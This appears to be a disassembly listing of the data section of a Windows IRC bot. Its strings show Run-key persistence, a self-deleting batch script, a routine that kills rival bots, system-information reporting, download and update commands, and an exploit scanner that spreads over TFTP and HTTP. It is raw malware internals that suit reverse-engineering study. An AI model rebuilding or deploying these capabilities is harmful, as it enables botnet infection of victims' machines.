dword_41F998 dd 45706FBEh ; DATA XREF: sub_4143D0+17AB�r
dword_41F99C dd 12835B01h ; DATA XREF: sub_4143D0+17B2�r
dword_41F9A0 dd 4EE4B28Ch ; DATA XREF: sub_4143D0+19F3�r
dword_41F9A4 dd 243185BEh ; DATA XREF: sub_4143D0+19FA�r
dword_41F9A8 dd 0D5FFB4E2h ; DATA XREF: sub_4143D0+1C39�r
dword_41F9AC dd 550C7DC3h ; DATA XREF: sub_4143D0+1C40�r
dword_41F9B0 dd 0F27B896Fh ; DATA XREF: sub_4143D0+1E91�r
dword_41F9B4 dd 72BE5D74h ; DATA XREF: sub_4143D0+1E9C�r
dword_41F9B8 dd 3B1696B1h ; DATA XREF: sub_4143D0+210D�r
dword_41F9BC dd 80DEB1FEh ; DATA XREF: sub_4143D0+2114�r
dword_41F9C0 dd 25C71235h ; DATA XREF: sub_4143D0+236A�r
dword_41F9C4 dd 9BDC06A7h ; DATA XREF: sub_4143D0+2371�r
dword_41F9C8 dd 0CF692694h ; DATA XREF: sub_4143D0+25B8�r
dword_41F9CC dd 0C19BF174h ; DATA XREF: sub_4143D0+25BF�r
dd 9EF14AD2h, 0E49B69C1h, 384F25E3h, 0EFBE4786h, 8B8CD5B5h
dd 0FC19DC6h, 77AC9C65h, 240CA1CCh, 592B0275h, 2DE92C6Fh
dd 6EA6E483h, 4A7484AAh, 0BD41FBD4h, 5CB0A9DCh, 831153B5h
dd 76F988DAh, 0EE66DFABh, 983E5152h, 2DB43210h, 0A831C66Dh
dd 98FB213Fh, 0B00327C8h, 0BEEF0EE4h, 0BF597FC7h, 3DA88FC2h
dd 0C6E00BF3h, 930AA725h, 0D5A79147h, 0E003826Fh, 6CA6351h
dd 0A0E6E70h, 14292967h, 46D22FFCh, 27B70A85h, 5C26C926h
dd 2E1B2138h, 5AC42AEDh, 4D2C6DFCh, 9D95B3DFh, 53380D13h
dd 8BAF63DEh, 650A7354h, 3C77B2A8h, 766A0ABBh, 47EDAEE6h
dd 81C2C92Eh, 1482353Bh, 92722C85h, 4CF10364h, 0A2BFE8A1h
dd 0BC423001h, 0A81A664Bh, 0D0F89791h, 0C24B8B70h, 654BE30h
dd 0C76C51A3h, 0D6EF5218h, 0D192E819h, 5565A910h, 0D6990624h
dd 5771202Ah, 0F40E3585h, 32BBD1B8h, 106AA070h, 0B8D2D0C8h
dd 19A4C116h, 5141AB53h, 1E376C08h, 0DF8EEB99h, 2748774Ch
dd 0E19B48A8h, 34B0BCB5h, 0C5C95A63h, 391C0CB3h, 0E3418ACBh
dd 4ED8AA4Ah, 7763E373h, 5B9CCA4Fh, 0D6B2B8A3h, 682E6FF3h
dd 5DEFB2FCh, 748F82EEh, 43172F60h, 78A5636Fh, 0A1F0AB72h
dd 84C87814h, 1A6439ECh, 8CC70208h, 23631E28h, 90BEFFFAh
dd 0DE82BDE9h, 0A4506CEBh, 0B2C67915h, 0BEF9A3F7h, 0E372532Bh
dd 0C67178F2h, 0EA26619Ch, 0CA273ECEh, 21C0C207h, 0D186B8C7h
dd 0CDE0EB1Eh, 0EADA7DD6h, 0EE6ED178h, 0F57D4F7Fh, 72176FBAh
dd 6F067AAh, 0A2C898A6h, 0A637DC5h, 0BEF90DAEh, 113F9804h
dd 131C471Bh, 1B710B35h, 23047D84h, 28DB77F5h, 40C72493h
dd 32CAAB7Bh, 15C9BEBCh, 3C9EBE0Ah, 9C100D4Ch, 431D67C4h
dd 0CB3E42B6h, 4CC5D4BEh, 0FC657E2Ah, 597F299Ch, 3AD6FAECh
dd 5FCB6FABh, 4A475817h, 6C44198Ch, 0C1059ED8h, 0CBBB9D5Dh
dd 367CD507h, 629A292Ah, 3070DD17h, 9159015Ah, 0F70E5939h
dd 152FECD8h, 0FFC00B31h, 67332667h, 68581511h, 8EB44A87h
dd 64F98FA7h, 0DB0C2E0Dh, 0BEFA4FA4h, 47B5481Dh, 90h dup(0)
dword_41FE50 dd 0F3BCC908h, 6A09E667h, 84CAA73Bh, 0BB67AE85h, 0FE94F82Bh
; DATA XREF: sub_4143A0+17�o
dd 3C6EF372h, 5F1D36F1h, 0A54FF53Ah, 0ADE682D1h, 510E527Fh
dd 2B3E6C1Fh, 9B05688Ch, 0FB41BD6Bh, 1F83D9ABh, 137E2179h
dd 5BE0CD19h, 90h dup(0)
dword_4200D0 dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh, 20646162h, 6F6C6C61h
dd 69746163h, 6E6Fh
dword_4200F0 dd 255C7325h, 73h ; DATA XREF: sub_416F86+DC�o
aSoftwareMicr_6 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_416F86+10C�o
align 4
aSoftwareMicr_7 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_416F86+14F�o
align 4
aSS_3 db '%s\%s',0 ; DATA XREF: sub_417119+BA�o
align 10h
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_417119+F9�o
align 10h
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_417119+14D�o
align 10h
aBadAllocatio_9 db 'bad allocation',0 ; DATA XREF: .kSjx934:00424A44�o
align 10h
aIrn db '--irn ',0 ; DATA XREF: .kSjx934:0041BC44�o
align 4
aSS_5 db '%s\%s',0 ; DATA XREF: .kSjx934:0041BCF1�o
align 10h
aSSS_0 db '%s %s%s',0 ; DATA XREF: .kSjx934:0041BDBF�o
aS_11 db '%s',0 ; DATA XREF: .kSjx934:0041BE51�o
align 4
aRm db 'RM',0 ; DATA XREF: .kSjx934:0041BF25�o
align 10h
aBk db 'BK',0 ; DATA XREF: .kSjx934:0041BF5E�o
align 4
aUnm db 'UNM',0 ; DATA XREF: .kSjx934:0041BF83�o
aBadAllocati_10 db 'bad allocation',0 ; DATA XREF: .kSjx934:00425224�o
align 4
aSS_6 db '%s %s',0Dh,0Ah,0 ; DATA XREF: sub_41829C+42�o
aSS_7 db '%s %s',0Dh,0Ah,0 ; DATA XREF: sub_41802F+159�o
aSS_8 db '%s-%s',0 ; DATA XREF: sub_41802F+1D6�o
align 10h
aSSSS00S db '%s %s',0Dh,0Ah ; DATA XREF: sub_41802F+24D�o
db '%s %s 0 0 :%s',0Dh,0Ah,0
align 4
asc_420238 db 0Dh,0Ah,0 ; DATA XREF: sub_417F01+7E�o
align 4
aS_10 db '%s',0 ; DATA XREF: sub_417F01+B6�o
align 10h
asc_420240 db 0Dh,0Ah,0 ; DATA XREF: sub_417F01+CB�o
align 4
aSSS_1 db '%s %s %s',0Dh,0Ah,0 ; DATA XREF: sub_417361+C2�o
align 10h
aS_12 db '%s',0 ; DATA XREF: sub_41783D+4A�o
align 4
asc_420254 db ' :',0 ; DATA XREF: sub_41783D+7E�o
align 4
aS_13 db '%s',0 ; DATA XREF: sub_41783D+8A�o
align 4
asc_42025C: ; DATA XREF: sub_41783D+E1�o
unicode 0, < >,0
aS_14 db '%s',0 ; DATA XREF: sub_41783D+FA�o
align 4
asc_420264: ; DATA XREF: sub_41783D+124�o
unicode 0, < >,0
aSS_9 db '%s %s',0Dh,0Ah,0 ; DATA XREF: sub_41783D+24A�o
aSSS_2 db '%s %s %s',0Dh,0Ah,0 ; DATA XREF: sub_41783D+31E�o
align 4
a001 db '001',0 ; DATA XREF: sub_41783D+33A�o
aSSSSSS db '%s %s %s',0Dh,0Ah ; DATA XREF: sub_41783D+3D3�o
db '%s %s %s',0Dh,0Ah,0
align 4
a332 db '332',0 ; DATA XREF: sub_41783D+417�o
asc_42029C db ' :',0 ; DATA XREF: sub_41783D+499�o
align 10h
aS_0 db '%s',0 ; DATA XREF: sub_41783D+4A5�o
align 4
asc_4202A4: ; DATA XREF: sub_41783D+4D9�o
unicode 0, <!>,0
aS_1 db '%s',0 ; DATA XREF: sub_41783D+4E5�o
align 4
a332_0 db '332',0 ; DATA XREF: sub_41783D+52D�o
aS_2 db '%s',0 ; DATA XREF: sub_41783D+546�o
align 4
aS_3 db '%s',0 ; DATA XREF: sub_41783D+5B1�o
align 4
aS_4 db '%s',0 ; DATA XREF: sub_41783D+5DF�o
align 4
asc_4202BC: ; DATA XREF: sub_41783D+64E�o
unicode 0, <;>,0
asc_4202C0: ; DATA XREF: sub_41783D:loc_417E92�o
unicode 0, <;>,0
asc_4202C4: ; DATA XREF: sub_41783D:loc_417E9F�o
unicode 0, <;>,0
asc_4202C8: ; DATA XREF: sub_417676+C�o
unicode 0, < >,0
aS_8 db '-s',0 ; DATA XREF: sub_417676+27�o
align 10h
aS_9 db '/s',0 ; DATA XREF: sub_417676+3F�o
align 4
asc_4202D4: ; DATA XREF: sub_417676:loc_4176CA�o
unicode 0, < >,0
aQwertyuiopasdf db 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPLKJHGFDSAZXCVBNM',0
; DATA XREF: sub_41748B+21�o
align 10h
asc_420310: ; DATA XREF: sub_41748B+5E�o
unicode 0, <[>,0
aSS db '%s%s|',0 ; DATA XREF: sub_41748B+95�o
align 4
aSS_0 db '%s%s|',0 ; DATA XREF: sub_41748B+C5�o
align 4
aSp db '%sP|',0 ; DATA XREF: sub_41748B+F0�o
align 4
aS0I64u db '%s0%I64u|',0 ; DATA XREF: sub_41748B+12F�o
align 4
aSI64u db '%s%I64u|',0 ; DATA XREF: sub_41748B+150�o
align 4
aSC db '%s%c',0 ; DATA XREF: sub_41748B+18F�o
align 4
aS db '%s]',0 ; DATA XREF: sub_41748B+1BA�o
aBadAllocati_11 db 'bad allocation',0
align 10h
aHs db 'HS',0 ; DATA XREF: sub_418D17+28�o
align 4
asc_420364: ; DATA XREF: sub_418C40+89�o
unicode 0, < >,0
aSS_10 db '%s\%s',0 ; DATA XREF: sub_418B1F+4E�o
align 10h
aGet db 'GET',0 ; DATA XREF: sub_418552+B7�o
aQue?_1 db 'Que?',0 ; DATA XREF: sub_418552+C7�o
align 10h
aHttp1_1501NotI db 'HTTP/1.1 501 Not Implemented',0Dh,0Ah ; DATA XREF: sub_418552+10F�o
db 'Content-Length: %d',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
aSSSS db '%s\%s\%s%s',0 ; DATA XREF: sub_418552+229�o
align 4
aSSS db '%s\%s\%s',0 ; DATA XREF: sub_418552+1F2�o
align 10h
aSS_4 db '%s\%s',0 ; DATA XREF: sub_418552+25A�o
align 4
aQue? db 'Que?',0 ; DATA XREF: sub_418552+3A8�o
align 10h
aQue?_0 db 'Que?',0 ; DATA XREF: sub_418552+2BE�o
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 ok',0Dh,0Ah ; DATA XREF: sub_418552+3FC�o
db 'Content-Length: %d',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHttpTransferD_ db 'HTTP: Transfer: %d.%d.%d.%d (N/A). %d Total Sends.',0
; DATA XREF: sub_418552+51D�o
align 4
aHttpTransfer_0 db 'HTTP: Transfer: %d.%d.%d.%d (%s). %d Total Sends.',0
; DATA XREF: sub_418552+54A�o
align 4
asc_42049C db 0Dh,0Ah,0 ; DATA XREF: sub_4184BF+11�o
align 10h
asc_4204A0: ; DATA XREF: sub_4184BF:loc_4184EB�o
unicode 0, < >,0
asc_4204A4: ; DATA XREF: sub_4184BF+3D�o
unicode 0, < >,0
asc_4204A8: ; DATA XREF: sub_4184BF+54�o
unicode 0, < >,0
asc_4204AC db 0Dh,0Ah ; DATA XREF: sub_4184BF+78�o
db 0Dh,0Ah,0
align 4
asc_4204B4 db '%x',0 ; DATA XREF: sub_418396+CA�o
align 4
aBadAllocati_12 db 'bad allocation',0
align 4
aS_15 db '%s',0 ; DATA XREF: sub_41B7F9+74�o
align 4
aSX db '%s%X',0 ; DATA XREF: sub_41B7F9+EC�o
align 4
aBadAllocati_13 db 'bad allocation',0
align 4
a@echoOff1DelSI db '@echo off',0Dh,0Ah ; DATA XREF: sub_4190BD+7E�o
db ':1',0Dh,0Ah
db 'del "%s"',0Dh,0Ah
db 'if exist "%s" goto 1',0Dh,0Ah
db 'del "%%0"',0Dh,0Ah,0
align 10h
aSTmpIIICCC_bat db '%s\tmp-%i%i%i-%c%c%c.bat',0 ; DATA XREF: sub_4190BD+FC�o
align 4
aW: ; DATA XREF: sub_4190BD+110�o
unicode 0, <w>,0
aS_6 db '%s',0 ; DATA XREF: sub_4190BD+12B�o
align 4
aRegistryMonito db 'Registry Monitor',0 ; DATA XREF: sub_419477+D9�o
align 4
aSoftwareMicr_1 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_419477+12A�o
align 4
aQuitSYouKill_0 db 'QUIT :%s YOU KILLED ME :<',0Dh,0Ah,0
aQuitSYouKilled db 'QUIT :%s YOU KILLED ME :< --UPDATED',0Dh,0Ah,0
; DATA XREF: sub_419477+15A�o
align 4
aRemoveAuthenti db 'Remove: Authentication Failed.',0
align 4
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_418FC6+4E�o
aVis db 'VIS',0 ; DATA XREF: sub_418E51+42�o
a2k3 db '2K3',0 ; DATA XREF: sub_418E51+55�o
aXp_0 db 'XP',0 ; DATA XREF: sub_418E51+62�o
align 4
a2k db '2K',0 ; DATA XREF: sub_418E51+6E�o
align 4
aMe db 'ME',0 ; DATA XREF: sub_418E51+81�o
align 4
a98 db '98',0 ; DATA XREF: sub_418E51+8E�o
align 10h
aNt db 'NT',0 ; DATA XREF: sub_418E51+A0�o
align 4
a95 db '95',0 ; DATA XREF: sub_418E51+AD�o
align 4
aUnk db 'UNK',0 ; DATA XREF: sub_418E51:loc_418F05�o
aOsMicrosoftWin db '[OS: Microsoft Windows %s %s (%i.%i build %i)]',0
; DATA XREF: sub_418E51+108�o
align 4
aS_5 db '%s',0 ; DATA XREF: sub_418E51+13A�o
align 10h
a192_168__ db '192.168.*.*',0 ; DATA XREF: sub_419347+32�o
a10___ db '10.*.*.*',0 ; DATA XREF: sub_419347+46�o
align 4
a111___ db '111.*.*.*',0 ; DATA XREF: sub_419347+5A�o
align 4
a15___ db '15.*.*.*',0 ; DATA XREF: sub_419347+6E�o
align 10h
a16___ db '16.*.*.*',0 ; DATA XREF: sub_419347+82�o
align 4
a101___ db '101.*.*.*',0 ; DATA XREF: sub_419347+96�o
align 4
a110___ db '110.*.*.*',0 ; DATA XREF: sub_419347+A6�o
align 4
a112___ db '112.*.*.*',0 ; DATA XREF: sub_419347+B6�o
align 10h
a170_65__ db '170.65.*.*',0 ; DATA XREF: sub_419347+C6�o
align 4
a172_D__ db '172.%d.*.*',0 ; DATA XREF: sub_419347+E0�o
align 4
aBadAllocati_14 db 'bad allocation',0
align 4
aBadAllocati_15 db 'bad allocation',0
align 4
aMessageboxa_0 db 'MessageBoxA',0 ; DATA XREF: sub_419677+12�o
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_419677+17�o
align 10h
dword_420700 dd 0D010Fh, 0C3000000h, 0 ; DATA XREF: sub_4195EC+19�o
dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh, 20646162h, 6F6C6C61h
dd 69746163h, 6E6Fh
dword_42072C dd 63257325h, 0 ; DATA XREF: sub_4196D1+55�o
dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh
dword_420744 dd 6C6E6977h, 6E6F676Fh, 6578652Eh, 0 ; DATA XREF: sub_419EA0+3C�o
dword_420754 dd 68637673h, 2E74736Fh, 657865h ; DATA XREF: sub_419EA0+44�o
dword_420760 dd 76726573h, 73656369h, 6578652Eh, 0 ; DATA XREF: sub_419EA0+4C�o
aOpenthread db 'OpenThread',0 ; DATA XREF: sub_419EA0+5F�o
align 4
aKernel32_dll_0 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+64�o
align 4
aOpenprocess db 'OpenProcess',0 ; DATA XREF: sub_419EA0+78�o
aKernel32_dll_1 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+7D�o
align 4
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_419EA0+8C�o
align 4
aKernel32_dll_2 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+91�o
align 4
aProcess32first db 'Process32First',0 ; DATA XREF: sub_419EA0+A0�o
align 4
aKernel32_dll_3 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+A5�o
align 4
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_419EA0+B4�o
align 4
aKernel32_dll_4 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+B9�o
align 4
aModule32first db 'Module32First',0 ; DATA XREF: sub_419EA0+C8�o
align 4
aKernel32_dll_5 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+CD�o
align 4
aModule32next db 'Module32Next',0 ; DATA XREF: sub_419EA0+DC�o
align 4
aKernel32_dll_6 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+E1�o
align 4
aThread32first db 'Thread32First',0 ; DATA XREF: sub_419EA0+F0�o
align 4
aKernel32_dll_7 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+F5�o
align 4
aThread32next db 'Thread32Next',0 ; DATA XREF: sub_419EA0+104�o
align 4
aKernel32_dll_8 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+109�o
align 4
aReadprocessmem db 'ReadProcessMemory',0 ; DATA XREF: sub_419EA0+118�o
align 4
aKernel32_dll_9 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+11D�o
align 4
aGetmodulefilen db 'GetModuleFileNameExA',0 ; DATA XREF: sub_419EA0+12C�o
align 10h
aPsapi_dll db 'psapi.dll',0 ; DATA XREF: sub_419EA0+131�o
align 4
aSS_2 db '%s\%s',0 ; DATA XREF: sub_419EA0+1F5�o
align 4
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_419EA0+2BE�o
align 4
aSedebugprivi_0 db 'SeDebugPrivilege',0 ; DATA XREF: sub_419EA0+365�o
align 4
aSystem db 'System',0 ; DATA XREF: sub_419EA0+390�o
align 4
aBotKilledS db 'Bot Killed: %s',0 ; DATA XREF: sub_419EA0+451�o
align 4
aSoftwareMicr_2 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_419A9F+36�o
align 4
aSoftwareMicr_3 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',0
; DATA XREF: sub_419A9F+3D�o
align 4
aSoftwareMicr_4 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx',0
; DATA XREF: sub_419A9F+44�o
aSoftwareMicr_5 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices',0
; DATA XREF: sub_419A9F+4B�o
align 4
aSystemControls db 'SYSTEM\ControlSet001\Services\Eventlog\System',0
; DATA XREF: sub_419C6D+26�o
align 4
aSS_1 db '%s\%s',0 ; DATA XREF: sub_419C6D+E4�o
align 4
aLdm db 'LDM',0 ; DATA XREF: sub_419C6D+118�o
aNetdde db 'NetDDE',0 ; DATA XREF: sub_419C6D+12B�o
align 4
aEventmessagefi db 'EventMessageFile',0 ; DATA XREF: sub_419C6D+142�o
align 4
aBadAllocati_16 db 'bad allocation',0
align 4
aListTTooLong db 'list<T> too long',0
align 10h
dd offset dword_420E80
off_420A74 dd offset nullsub_1 ; DATA XREF: sub_41BB84+23�o
dd 7325h, 652Dh, 31h, 4C44h
aDlAuthFailure_ db 'DL: Auth Failure.',0
align 4
aDlInvalidArgum db 'DL: Invalid Arguments',0
align 4
aUpdAuthFailure db 'UPD: Auth Failure.',0
align 4
aUpdInvalidArgu db 'UPD: Invalid Arguments.',0
dd offset dword_421030
off_420AE4 dd offset sub_40177B ; DATA XREF: .kSjx934:0041C3BA�o
dd offset dword_420FE4
off_420AEC dd offset sub_4019F3 ; DATA XREF: .kSjx934:0041C3D6�o
aHttpSDS_3 db 'http://%s:%d/%s',0
dd offset dword_42107C
off_420B04 dd offset sub_401C1D ; DATA XREF: .kSjx934:0041C3F2�o
aSystemSCpuIXS@ db 'System: %s [CPU: %i x %s @ %dMhz] [RAM: %iMB/%iMB] [Country: %s] '
db '[IP: %s] [User: %s] [System Dir: %s] [Uptime: %I64ud %I64uh %I64u'
db 'm]',0
align 10h
aNetIpSHostNA db 'Net: IP: %s Host: N/A',0
align 4
aNetIpSHostS db 'Net: IP: %s Host: %s',0
align 10h
dd offset dword_421114
off_420BC4 dd offset sub_401CC0 ; DATA XREF: .kSjx934:0041C40E�o
dd offset dword_4210C8
off_420BCC dd offset sub_401E82 ; DATA XREF: .kSjx934:0041C42A�o
aScanUnknownExp db 'Scan: Unknown Exploit.',0
align 4
a____0 db '*.*.*.*',0
aA db '-a',0
align 4
aB db '-b',0
align 4
aC db '-c',0
align 4
aScanNotEnoughT db 'Scan: Not Enough Threads. %d Available.',0
aD_D_D_D_0 db '%d.%d.%d.%d',0
aX_ db 'x.',0
align 4
aD_ db '%d.',0
aSx_ db '%sx.',0
align 10h
aSD_ db '%s%d.',0
align 4
aSx db '%sx',0
aSD db '%s%d',0
align 4
aD_x_x_x db '%d.x.x.x',0
align 10h
aD_D_x_x db '%d.%d.x.x',0
align 4
aD_D_D_x db '%d.%d.%d.x',0
align 4
aScanSDUsingDTh db 'Scan: %s:%d Using %d Threads.',0
align 4
aScanner db 'Scanner',0
aScanAllScanThr db 'Scan: All Scan Threads Stopped. %d killed.',0
align 4
aStatisticsExpl db 'Statistics: Exploits:',0
align 4
aSSD db '%s %s: %d',0
align 10h
aSDaemons db '%s; Daemons:',0
align 10h
aSTftpD db '%s TFTP: %d',0
aSHttpD db '%s HTTP: %d',0
dd offset dword_4211F8
off_420D1C dd offset sub_401F1C ; DATA XREF: .kSjx934:0041C454�o
dd offset dword_4211AC
off_420D24 dd offset sub_40243A ; DATA XREF: .kSjx934:0041C470�o
dd offset dword_421160
off_420D2C dd offset sub_40251A ; DATA XREF: .kSjx934:0041C48C�o
dbl_420D30 dq 5.0e-1 ; DATA XREF: sub_41A9DE:loc_41AF68�r
flt_420D38 dd 4.2949673e9 ; DATA XREF: sub_41A9DE+584�r
align 10h
dd 48h, 0Eh dup(0)
dd offset dword_423064
dd offset dword_421250
dd 10h
dword_420D88 dd 3 dup(0) ; DATA XREF: .kSjx934:0041D334�o
dd offset off_423008
dd offset dword_420D9C
dword_420D9C dd 2 dup(0) ; DATA XREF: .kSjx934:00420D98�o
dd 3, 420DACh, 420DBCh, 420F48h, 420F94h, 0
dd offset off_423008
dd 2, 0
dd 0FFFFFFFFh, 0
dd 40h, 420D9Ch
dword_420DD8 dd 3 dup(0) ; DATA XREF: .kSjx934:0041D368�o
dd offset off_425958
dd offset dword_420FB0
dword_420DEC dd 3 dup(0) ; DATA XREF: .kSjx934:0041D388�o
dd offset off_423030
dd offset dword_420E00
dword_420E00 dd 2 dup(0) ; DATA XREF: .kSjx934:00420DFC�o
dd 1, 420E10h, 420E18h, 0
dd offset off_423030
dd 2 dup(0)
dd 0FFFFFFFFh, 0
dd 40h, 420E00h
dword_420E34 dd 3 dup(0) ; DATA XREF: .kSjx934:0041DC20�o
dd offset off_423E50
dd offset dword_420E48
dword_420E48 dd 2 dup(0) ; DATA XREF: .kSjx934:00420E44�o
dd 2, 420E58h, 420E64h, 420F94h, 0
dd offset off_423E50
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 420E48h
dword_420E80 dd 3 dup(0) ; DATA XREF: .kSjx934:00420A70�o
dd offset off_425900
dd offset dword_420E94
dword_420E94 dd 2 dup(0) ; DATA XREF: .kSjx934:00420E90�o
dd 1, 420EA4h, 420EACh, 0
dd offset off_425900
dd 2 dup(0)
dd 0FFFFFFFFh, 0
dd 40h, 420E94h
dword_420EC8 dd 3 dup(0) ; DATA XREF: .kSjx934:0041D328�o
dd offset off_425918
dd offset dword_420EDC
dword_420EDC dd 2 dup(0) ; DATA XREF: .kSjx934:00420ED8�o
dd 3, 420EECh, 420EFCh, 420F48h, 420F94h, 0
dd offset off_425918
dd 2, 0
dd 0FFFFFFFFh, 0
dd 40h, 420EDCh
dword_420F18 dd 3 dup(0) ; DATA XREF: .kSjx934:0041D31C�o
dd offset off_425938
dd offset dword_420F2C
dword_420F2C dd 2 dup(0) ; DATA XREF: .kSjx934:00420F28�o
dd 2, 420F3Ch, 420F48h, 420F94h, 0
dd offset off_425938
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 420F2Ch, 3 dup(0)
dd offset off_425974
dd offset dword_420F78
dword_420F78 dd 2 dup(0) ; DATA XREF: .kSjx934:00420F74�o
dd 2, 420F88h, 420FC8h, 420F94h, 0
dd offset off_425958
align 10h
dd 0FFFFFFFFh, 0
dd 40h, 420FB0h
dword_420FB0 dd 2 dup(0) ; DATA XREF: .kSjx934:00420DE8�o
dd 1, 420FC0h, 420F94h, 0
dd offset off_425974
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 420F78h
dword_420FE4 dd 3 dup(0) ; DATA XREF: .kSjx934:00420AE8�o
dd offset off_425990
dd offset dword_420FF8
dword_420FF8 dd 2 dup(0) ; DATA XREF: .kSjx934:00420FF4�o
dd 2, 421008h, 421014h, 420EACh, 0
dd offset off_425990
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 420FF8h
dword_421030 dd 3 dup(0) ; DATA XREF: .kSjx934:00420AE0�o
dd offset off_4259A8
dd offset dword_421044
dword_421044 dd 2 dup(0) ; DATA XREF: .kSjx934:00421040�o
dd 2, 421054h, 421060h, 420EACh, 0
dd offset off_4259A8
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 421044h
dword_42107C dd 3 dup(0) ; DATA XREF: .kSjx934:00420B00�o
dd offset off_4259BC
dd offset dword_421090
dword_421090 dd 2 dup(0) ; DATA XREF: .kSjx934:0042108C�o
dd 2, 4210A0h, 4210ACh, 420EACh, 0
dd offset off_4259BC
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 421090h
dword_4210C8 dd 3 dup(0) ; DATA XREF: .kSjx934:00420BC8�o
dd offset off_4259D8
dd offset dword_4210DC
dword_4210DC dd 2 dup(0) ; DATA XREF: .kSjx934:004210D8�o
dd 2, 4210ECh, 4210F8h, 420EACh, 0
dd offset off_4259D8
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 4210DCh
dword_421114 dd 3 dup(0) ; DATA XREF: .kSjx934:00420BC0�o
dd offset off_4259F4
dd offset dword_421128
dword_421128 dd 2 dup(0) ; DATA XREF: .kSjx934:00421124�o
dd 2, 421138h, 421144h, 420EACh, 0
dd offset off_4259F4
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 421128h
dword_421160 dd 3 dup(0) ; DATA XREF: .kSjx934:00420D28�o
dd offset off_425A10
dd offset dword_421174
dword_421174 dd 2 dup(0) ; DATA XREF: .kSjx934:00421170�o
dd 2, 421184h, 421190h, 420EACh, 0
dd offset off_425A10
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 421174h
dword_4211AC dd 3 dup(0) ; DATA XREF: .kSjx934:00420D20�o
dd offset off_425A2C
dd offset dword_4211C0
dword_4211C0 dd 2 dup(0) ; DATA XREF: .kSjx934:004211BC�o
dd 2, 4211D0h, 4211DCh, 420EACh, 0
dd offset off_425A2C
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 4211C0h
dword_4211F8 dd 3 dup(0) ; DATA XREF: .kSjx934:00420D18�o
dd offset off_425A48
dd offset dword_42120C
dword_42120C dd 2 dup(0) ; DATA XREF: .kSjx934:00421208�o
dd 2, 42121Ch, 421228h, 420EACh, 0
dd offset off_425A48
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 42120Ch, 3 dup(0)
dword_421250 dd 42C4h, 43C9h, 6640h, 8658h, 0EB68h, 1C1D3h, 1C1EEh
; DATA XREF: .kSjx934:00420D80�o
dd 1C209h, 1C22Ch, 1C24Fh, 1C274h, 1C299h, 1C2BCh, 1C2E1h
dd 1C313h, 1C348h, 0
dword_421294 dd 2 dup(0) ; DATA XREF: sub_40B042+2�o
; sub_40B042+7�o
dword_42129C dd 2 dup(0) ; DATA XREF: sub_40B066+2�o
; sub_40B066+7�o
dd offset sub_40264D
dd 0
dd offset dword_4212DC
dd 0FFFFFFFFh, 41C1CBh
dword_4212B8 dd 19930522h, 1, 4212B0h, 5 dup(0) ; DATA XREF: .kSjx934:0041C1E4�o
dd 1
dword_4212DC dd 3, 4212ECh, 421940h, 42195Ch, 0 ; DATA XREF: .kSjx934:004212AC�o
dd offset off_423008
align 8
dd 0FFFFFFFFh, 0
dd 28h, 4026F8h, 0FFFFFFFEh, 0
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_402AD7
align 8
dd 0FFFFFFFEh, 0
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_402E1B
align 8
dd 0FFFFFFFEh, 0
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_4031EA
align 8
dd 0FFFFFFFEh, 0
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40334C
align 8
dd 0FFFFFFFEh, 0
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_403535
align 8
dd 0FFFFFFFEh, 0
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_403659
align 8
dd 0FFFFFFFEh, 0
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_4036D7
align 8
dd 0FFFFFFFEh, 0
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_403D75
align 8
